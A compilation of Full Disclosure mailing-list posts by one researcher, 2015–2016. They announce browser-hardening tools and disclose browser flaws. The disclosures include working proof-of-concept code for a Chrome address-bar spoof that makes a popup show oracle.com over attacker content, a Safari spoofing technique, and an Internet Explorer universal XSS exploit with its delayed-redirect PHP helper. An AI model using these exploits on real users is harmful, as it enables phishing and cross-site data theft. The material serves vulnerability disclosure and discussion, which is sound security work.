[FD] HTTPS Only 3.1 (Detailed Analysis, Browser Security, Open Source, Python)

2016-03-23 Thread David Leo
To secure the browser, which is very fragile, the approach of HTTPS Only 3.1 is 
exceptionally simple:
1. Only HTTPS URLs (no other protocols)
2. Whitelist of domains (anything outside of the whitelist is blocked)

Now, let's look at threats:
1. Man in the middle - it's fixed.
2. Phishing always requires the browser to load the attacker's website, so it's 
permanently dead here.
3. Drive-by Download - dead (if applied strictly, unable to download the 
executable)
4. Clickjacking - dead (attacker's web page is unreachable)
5. Address Spoofing - dead too (just unable to load the fake content)
6. XSS - almost dead (for the attacker, the XSS vulnerability has to be GET, 
because POST requires the attacker's HTML)
7. CSRF - almost dead (for the attacker, the CSRF vulnerability has to be GET, 
and modern web applications simply don't do important things in GET, because it 
can be bookmarked etc., too dangerous)

URLs:
Project Home Page: https://www.httpsonly.net/
View Source Code: https://www.httpsonly.net/source/

Kind Regards,


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] Browser Security Tool: HTTPS Only 2.1 (Major Release, Open Source, Python)

2016-03-03 Thread David Leo
When we browse the web, top threats are:
1. Remote code execution - everything is lost
2. Man in the middle - sniffing, and tampering
3. Phishing - simple, old, and still quite useful
4. Cross site scripting - data of the vulnerable domain is lost
5. CSRF - unauthorized action

So, what if the browser can only access HTTPS of whitelisted domains? With HTTPS, 
"man in the middle" is fixed. And with the whitelist, other attacks become very 
difficult, some even become impossible (such as phishing). Phishing is a huge 
headache in this era, because URLs can be hidden in legitimate redirection (such 
as t.co).

That's why we made this simple tool (really simple - less than 200 lines of 
Python and JavaScript):
Project Home Page - https://www.httpsonly.net/
Source Code - https://github.com/httpsonly/httpsonly

Kind Regards,




[FD] Browser Security Tool: HTTPS Only (Why, How, Open Source, Python)

2016-02-16 Thread David Leo
(@moderators The original post was too brief. This one has details.)

Summary

This tool completely locks the browser - just HTTPS, nothing else. This
tool is extremely simple - less than 100 lines of code (Python and
JavaScript).

Why

Firefox Add-on Firesheep Brings Hacking to the Masses
http://www.pcworld.com/article/208727/Firesheep_Brings_Hacking_to_the_Masses.html
"Firesheep is basically a packet sniffer that can analyze all the
unencrypted Web traffic"
(Quite a while ago, it's become a "casual game")

Yes, Mozilla said, "Gradually phasing out access to browser features
for non-secure websites", in April 2015. After more than six months,
they have done nothing useful.

The Chrome team wanted the same stuff:
https://www.chromium.org/Home/chromium-security/marking-http-as-non-secure
Again, nothing significant has been achieved yet.

And there is HTTPS Everywhere, with SO MANY rules:
https://www.eff.org/https-everywhere/atlas/
It's still able to access HTTP by default, but there is "Block all
HTTP requests". The problem: nothing happens when the browser tries HTTP -
there should be a warning (it's incorrect behavior) and options (try
HTTPS, Google Cache, etc.). People complained, months ago:
https://github.com/EFForg/https-everywhere/issues/1329

How

PAC (Proxy auto-config) is used:
If it's HTTPS, that's fine.
If it's HTTP, the user gets a warning and options (try HTTPS, Google Cache -
it has HTTPS, etc.).
Anything else, it goes to 0.0.0.0

It's a simple tool that does one job, and does it very well.

URLs

https://httpsonly.github.io/
https://github.com/httpsonly/httpsonly

Best Wishes,

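As an added example (my own code, not the httpsonly project's PAC file), here is a proxy auto-config script that implements the policy described in the "How" section above and in the HTTPS Only 3.1 post: HTTPS to a whitelisted domain passes, plain HTTP is handed to a local warning proxy, and every other scheme is sent to 0.0.0.0. The whitelist and the 127.0.0.1:8080 warning proxy are constructed assumptions, and the script is kept to ES5 because browser PAC engines do not support newer syntax.

```javascript
// Added example, not code from the httpsonly project. Assumed values: the
// whitelist below is a constructed sample and 127.0.0.1:8080 is a hypothetical
// local helper that serves the "this was HTTP, try HTTPS instead" page.
var WHITELIST = ["github.com", "www.httpsonly.net", "nmap.org"];

// True if host is exactly an allowed domain or a subdomain of one.
// The suffix check includes the leading dot, so "github.com.evil.example"
// does not match "github.com".
function isWhitelisted(host) {
  host = host.toLowerCase();
  for (var i = 0; i < WHITELIST.length; i++) {
    var d = WHITELIST[i];
    if (host === d || host.slice(-(d.length + 1)) === "." + d) {
      return true;
    }
  }
  return false;
}

// Entry point the browser calls for every request. Only the scheme and host
// are used, since browsers strip path and query from https URLs before
// handing them to PAC.
//   "DIRECT"               - let the request through
//   "PROXY 127.0.0.1:8080" - local warning proxy for plain HTTP
//   "PROXY 0.0.0.0:80"     - nothing listens there, so the load fails
function FindProxyForURL(url, host) {
  var scheme = url.split(":")[0].toLowerCase();
  if (scheme === "https") {
    return isWhitelisted(host) ? "DIRECT" : "PROXY 0.0.0.0:80";
  }
  if (scheme === "http") {
    return "PROXY 127.0.0.1:8080";
  }
  // ftp:, ws:, or anything else: blocked outright.
  return "PROXY 0.0.0.0:80";
}
```

Whether a single unreachable PROXY entry fails closed (rather than falling back to DIRECT) depends on the browser, so that behaviour should be verified on each browser the policy is deployed to.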


[FD] Open source tool for applying Google Chrome security updates

2015-08-12 Thread David Leo

The Problem
If you are a network administrator, keeping the browser updated is the first thing 
to do for security. Chrome is a very good browser, but it's a little bit 
complicated to answer this simple question: what is the version of the latest 
stable Chrome? And for people in places such as China (no Google services), 
updating Chrome is not an easy task.

The Solution
The official blog of Chrome Releases contains a lot of information. Code of 
this project extracts the version number from the official blog, downloads 
offline installers from the official website if it's a new version, and checks 
whether the visitor's Chrome is exactly the same.

Security
The best part of this project - users do not need to download and run software 
to be checked. This project does not even contain JavaScript.

URLs
Source Code https://github.com/windowschrome
Home Page http://www.windowschrome.com/
Latest Stable Chrome http://www.windowschrome.com/data/version.txt




[FD] Google Chrome Address Spoofing - Google's Opinion

2015-07-07 Thread David Leo

It's public now:
https://code.google.com/p/chromium/issues/detail?id=497588

Interesting Points:

They did reproduce:
"I can reproduce this locally"

They say it's DoS:
"seems like any renderer denial-of-service"
(The browser does not crash!)

They say it's not a security issue:
"remove security flags from this bug"

Finally, they stopped replying:
Jun 10 to Jul 2
(unbelievably huge delay)

In the end, they get it:
"Lots of phishing attacks these days tell you to call a phone number"
"No interactions"

Currently, it's Severity-Medium.

Kind Regards,

PS
http://dieyu.org/
Updated!




[FD] Google Chrome Address Spoofing (Request For Comment)

2015-06-30 Thread David Leo

Impact:
The click to verify thing is completely broken...
Anyone can be BBB Accredited Business etc.
You can make whitehouse.gov display We love Islamic State :-)

Note:
No user interaction on the fake page.

Code:
* index.html
<script>
function next()
{
w.location.replace('http://www.oracle.com/index.html?'+n);n++;
setTimeout("next();",15);
setTimeout("next();",25);
}
function f()
{
w=window.open("content.html","_blank","width=500 height=500");

i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5);
}
</script>
<a href="#" onclick="f()">Go</a><br>
* content.html
<b>This web page is NOT oracle.com</b>
<script>location="http://www.oracle.com/index.html";</script>
* It's online
http://www.deusen.co.uk/items/gwhere.6128645971389012/
(The page says June/16/2015 - it works as we tested today)

Request For Comment:
We reported this to Google.
They reproduced, and say:
It's DoS which doesn't matter.
We think it's very strange,
since the browser does not crash (not DoS),
and the threat is obvious.
What's your opinion?

Kind Regards,

PS
We love clever tricks.
We love this:
http://dieyu.org/




Re: [FD] Safari Address Spoofing (How We Got It)

2015-06-02 Thread David Leo

Great blog, Michal!

If you change "http://1.2.3.4/" in your Safari code to
some URL in the real world (for example, dailymail.co.uk),
your code won't work (page of target domain is simply loaded).

The trick here is: keep trying to load.

Kind Regards,

__
BestSec
http://www.deusen.co.uk/items/bestsec/
We like it. We read it.

On 2015/5/31 23:09, Michal Zalewski wrote:

Well... 
http://lcamtuf.blogspot.com/2010/06/yeah-about-that-address-bar-thing.html

On Thu, May 28, 2015 at 10:47 PM, David Leo <david@deusen.co.uk> wrote:

Proof of concept:
http://www.deusen.co.uk/items/iwhere.9500182225526788/
It works on fully patched versions of iOS and OS X.
How it works:
Just keep trying to load the web page of target domain.

How We Got It:
Safari changes address bar to new URL,
BEFORE new content is loaded.

BestSec
http://www.deusen.co.uk/items/bestsec/
We like it. We read it.

Kind Regards,




[FD] Safari Address Spoofing (How We Got It)

2015-05-31 Thread David Leo

Proof of concept:
http://www.deusen.co.uk/items/iwhere.9500182225526788/
It works on fully patched versions of iOS and OS X.
How it works:
Just keep trying to load the web page of target domain.

How We Got It:
Safari changes address bar to new URL,
BEFORE new content is loaded.

BestSec
http://www.deusen.co.uk/items/bestsec/
We like it. We read it.

Kind Regards,




[FD] Very Important Info About Major Internet Explorer Vulnerability - NOT Patched

2015-02-07 Thread David Leo

1.
Spartan - vulnerable (Windows 10)
http://www.deusen.co.uk/items/insider3show.3362009741042107/SpartanWin10_screenshot.png
Thanks to Zaakiy Siddiqui!

2.
<?php
sleep(2);
header("Location: http://www.dailymail.co.uk/robots.txt");
?>
Many asked for it.

3.
It's Universal XSS, as we tested:
Not only dailymail.co.uk - also Yahoo etc
Not only injecting content - also getting private info etc.

Kind Regards,




Re: [FD] Major Internet Explorer Vulnerability - NOT Patched

2015-02-07 Thread David Leo

"could you share the contents of 1.php?"
Sure:
<?php
sleep(2);
header("Location: http://www.dailymail.co.uk/robots.txt");
?>

"I'm assuming it is a delayed re-direct to the target's domain?"
Exactly. :-)

"the cloudflare scripts"
It's been tested without them.

Kind Regards,

On 2015/2/6 2:31, Barkley, Peter wrote:

Thanks Zaakiy,

I'm able to get the hacked page on IE9 after changing the document mode from 
Quirks to IE9 Standards. Screenshot attached. I'm sure you could get around 
having to manually switch the document mode with the appropriate DOCTYPE set in 
the exploit html page.

David, could you share the contents of 1.php? I'm assuming it is a delayed 
re-direct to the target's domain? I am unable to reproduce the exploit locally with the 
same code (assuming my 1.php is correct), though without the cloudflare scripts.

Thanks,
Peter


Peter Barkley | Senior Security Intelligence Analyst | Security Operations 
Centre | Royal Bank of Canada



-Original Message-
From: Fulldisclosure [mailto:fulldisclosure-boun...@seclists.org] On Behalf Of 
Zaakiy Siddiqui
Sent: 2015, February, 04 6:46 PM
To: David Leo; Joey Fowler
Cc: fulldisclosure@seclists.org; b...@securitytracker.com; 
bugt...@securityfocus.com; cve-ass...@mitre.org
Subject: Re: [FD] Major Internet Explorer Vulnerability - NOT Patched

Hi David,

Nice one…great find!  And thanks Joey for confirming the bypass of 
HTTP-to-HTTPS restrictions.

I can confirm that this also affects Spartan Browser (Experimental enabled in 
about:flags in Internet Explorer 11).

I can also confirm that IE 10 is affected.

IE 9 appears to not be vulnerable. Screenshots below.

Regards,
Zaakiy Siddiqui


IE 11 Spartan - vulnerable (Windows 10)



IE 10 - vulnerable (Windows 7)

IE 9 - not vulnerable (Windows 7)



From: David Leo <david@deusen.co.uk>
Sent: Wednesday, 4 February 2015 11:13 PM
To: Joey Fowler <j...@tumblr.com>
Cc: bugt...@securityfocus.com, fulldisclosure@seclists.org, 
b...@securitytracker.com, cve-ass...@mitre.org

Microsoft was notified on Oct 13, 2014.

Joey thank you very much for your words.

Kind Regards,

On 2015/2/3 4:53, Joey Fowler wrote:

Hi David,

"nice" is an understatement here.

I've done some testing with this one and, while there /are/ quirks, it most 
definitely works. It even bypasses standard HTTP-to-HTTPS restrictions.

As long as the page(s) being framed don't contain X-Frame-Options headers (with 
`deny` or `same-origin` values), it executes successfully. Pending the payload 
being injected, most Content Security Policies are also bypassed (by injecting 
HTML instead of JavaScript, that is).

It looks like, through this method, all viable XSS tactics are open!

Nice find!

Has this been reported to Microsoft outside (or within) this thread?

--
Joey Fowler
Senior Security Engineer, Tumblr



On Sat, Jan 31, 2015 at 9:18 AM, David Leo <david@deusen.co.uk> wrote:

 Deusen just published code and description here:
 http://www.deusen.co.uk/items/insider3show.3362009741042107/
 which demonstrates the serious security issue.

 Summary
 An Internet Explorer vulnerability is shown here:
 Content of dailymail.co.uk can be changed by external domain.

 How To Use
 1. Close the popup window (confirm dialog) after three seconds.
 2. Click Go.
 3. After 7 seconds, "Hacked by Deusen" is actively injected into 
 dailymail.co.uk.

 Technical Details
 Vulnerability: Universal Cross Site Scripting (XSS)
 Impact: Same Origin Policy (SOP) is completely bypassed
 Attack: Attackers can steal anything from another domain, and inject 
 anything into another domain
 Tested: Jan/29/2015 Internet Explorer 11 Windows 7

 If you like it, please reply "nice".

 Kind Regards,


[FD] Major Internet Explorer Vulnerability - NOT Patched

2015-01-31 Thread David Leo

Deusen just published code and description here:
http://www.deusen.co.uk/items/insider3show.3362009741042107/
which demonstrates the serious security issue.

Summary
An Internet Explorer vulnerability is shown here:
Content of dailymail.co.uk can be changed by external domain.

How To Use
1. Close the popup window (confirm dialog) after three seconds.
2. Click Go.
3. After 7 seconds, "Hacked by Deusen" is actively injected into 
dailymail.co.uk.

Technical Details
Vulnerability: Universal Cross Site Scripting (XSS)
Impact: Same Origin Policy (SOP) is completely bypassed
Attack: Attackers can steal anything from another domain, and inject anything 
into another domain
Tested: Jan/29/2015 Internet Explorer 11 Windows 7

If you like it, please reply "nice".

Kind Regards,

